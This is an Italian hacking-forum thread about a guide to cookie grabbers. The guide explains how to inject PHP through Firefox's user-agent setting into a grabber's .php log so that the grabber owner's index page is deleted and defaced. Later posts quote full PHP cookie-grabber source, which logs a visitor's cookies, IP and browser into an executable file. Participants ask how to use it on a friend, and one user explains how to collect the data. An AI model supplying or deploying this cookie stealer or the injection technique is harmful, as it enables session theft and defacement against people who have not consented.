Toggle sidebar
  • Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Grabber,come lasciare "simpatici" ricordini

allora nn ho capito il codice lo devo mettere sul notepad e in che estensione lo salvo ?? e poi cosa devo farci? aiuto :soso:
 
Riferimento: Grabber,come lasciare "simpatici" ricordini

Bravo Ottima Guida Direi Che Sei Molto Perfido Sui Pc :emoji_slight_smile:
 
Riferimento: Grabber,come lasciare "simpatici" ricordini

Bravo lo testo subito :emoji_smiley:
 
Riferimento: Grabber,come lasciare "simpatici" ricordini

Z3R0 ma io non ho capito il primo passaggio >.< ho capito tutto tranne dove parli dei log come faccio a mandarli il grabber se non me lo chiede? rispondimi al piu presto
Ps:Ti voglio parlare su facebook se c'e l'hai dimmi come ti chiami
 
Riferimento: Grabber,come lasciare "simpatici" ricordini

scusatemi l'ignoranza. non ho capito il fine di questa guida. Si rubano tutti i cockie che visita la vittima?
L'impostazione di mozilla avviene sul pc della vittima vero? e fireefox come gestisce quella opzione useragent.extra.firefox . da quello che so non ha un interprete php.
grazie
ciao
 
Riferimento: Grabber,come lasciare "simpatici" ricordini

Walter evita di postare inutilmente, oppure argomenta maggiormente i tuoi post!
 
Riferimento: Grabber,come lasciare "simpatici" ricordini

Semplicemente Diabolico! Fantastico! Gramde Th3Z3R0 :banana2:
 
TheZero ha detto:
Salve ragazzi.Sto andando a mangiare le polpettine di mio zio,ed ho pensato che sicuramente è meglio scrivere prima altrimenti dopo non ci sto più con la testa xD.
Bene iniziamo: con questa guida riuscirete a lasciare un simpaticissimo (ma quando mai) messaggio a chi vuole fregarvi.La guida è interattiva,ciò significa che risponde a due possibili situazioni.La prima è: avete trovato un grabber,che salva in un file tra tutti i dati possibili anche il vostro tipo di broswer restituendo le solite scritte Moziall/3.0.5 Mozilla/5 Windows... ecc,e magari sapete anche dove mette i log.Supponiamo nel documento file.php o file.html.Ma se non lo sapete don't worry: la cosa sarà più perfida: lo stesso possessore del coockie grabber si danneggerà da solo,aprendo per primo i log ed eseguendo egli stesso il codice malefico (ovviamente a sua insaputa :cettu:emoji_slight_smile:.La seconda possibilità è: un "amico" vi chiede un grabber.Nulla di più semplice voi fornitegli questo codice bello fresco :
PHP:
Perfavore, Entra oppure Registrati per vedere i codici!
NB.:file.php può anche essere file.html

Siccome non siamo tanti lamerucci vi spiego un po cosa fa: prende i cookie (molto difficilmente :emoji_relieved:) prende la data,la pagina dalla quale provenite e ultimo ma non meno importante carpisce il broswer dal quale navigate.Fatto ciò scrive nel file file.php.Se temete che il vostro ip possa essere utilizzato ma non volete cancellare la stringa che prende l'ip perchè il vostro "amico" punta anche su quello,moficate il codice in tal modo:
PHP:
Perfavore, Entra oppure Registrati per vedere i codici!

Ecco la home del mio sito in locale prima dell'attacco:
prima.png

Ora siamo pronti.Individuato il sito,o passato all' "amico" il grabber basterà fare ciò:
-Da mozilla firefox digitare about:config
-Nella casella di ricerca inserite Mozilla
-Scrollate ed individuerete la voce general.useragent.extra.firefox (in alternativa ricercate proprio general.useragent.extra.firefox)
-Fatto ciò ed individuata la stringa fate tasto destro,modifica oppure direttamente doppio click
-Nel box che apparirà inserite questo codice:
PHP:
Perfavore, Entra oppure Registrati per vedere i codici!

(gli invii verranno automaticamente trasformati in spazi c'è bisogno di dirlo? :sisi:emoji_slight_smile:

La stringa nel mio firefox:
iniziamo.png
Il box dove inserire la nuova stringa:
inseriamolastringamalef.png

Quindi:
-andate nella pagina del cookie
-attendete il caricamento (ma va)
-andate sui log (se avete il link dei log altrimenti attendete che la vittima apra da se la pagina)

Il cookie grabber sul mio sito in locale:
facciamociingannare.png
I log del cookie,dove viene iniettato il codice php:
apriamoilog.png

Effetti:
-la pagina index.html (modificate il codice per una index in php [index.php]) verrà cancellata ed al suo posto inserita quella simpatica (:emoji_relieved:) scritta.

Ed ecco la scritta sul mio sito in locale:
defacecompiuto.png

Tutto chiaro? Ebbene per neutralizzare ciò basterà che la pagina in cui salvare i dati sia file.txt :emoji_relieved: semplice e perfido.Oppure inserite un php die.
Alla prossima!
N.B.:Se non vi funge è perchè dovete cambiare nella stirng auser agent tutti gli apici ' o " con "
Clicca per espandere...

Ma quindi se salvo sto codice:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$browser = $_SERVER['HTTP_USER_AGENT'];
$fp = fopen('file.php', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Browser: '.$browser.'<br><br>');
fclose($fp);
?>
come file .html e lo faccio aprire ad un mio amico, i suoi dati dove mi arrivano tanto per curiosità?
@TheZero
 
Gameloft ha detto:
Ma quindi se salvo sto codice:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$browser = $_SERVER['HTTP_USER_AGENT'];
$fp = fopen('file.php', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Browser: '.$browser.'<br><br>');
fclose($fp);
?>
come file .html e lo faccio aprire ad un mio amico, i suoi dati dove mi arrivano tanto per curiosità?
@TheZero
Clicca per espandere...

Devi salvarlo in .php e i file ti arrivano nel file file.php (puoi modificarlo dalla linea 7)
 
Devi accedere o registrarti per rispondere qui.
 
 
Top
Indietro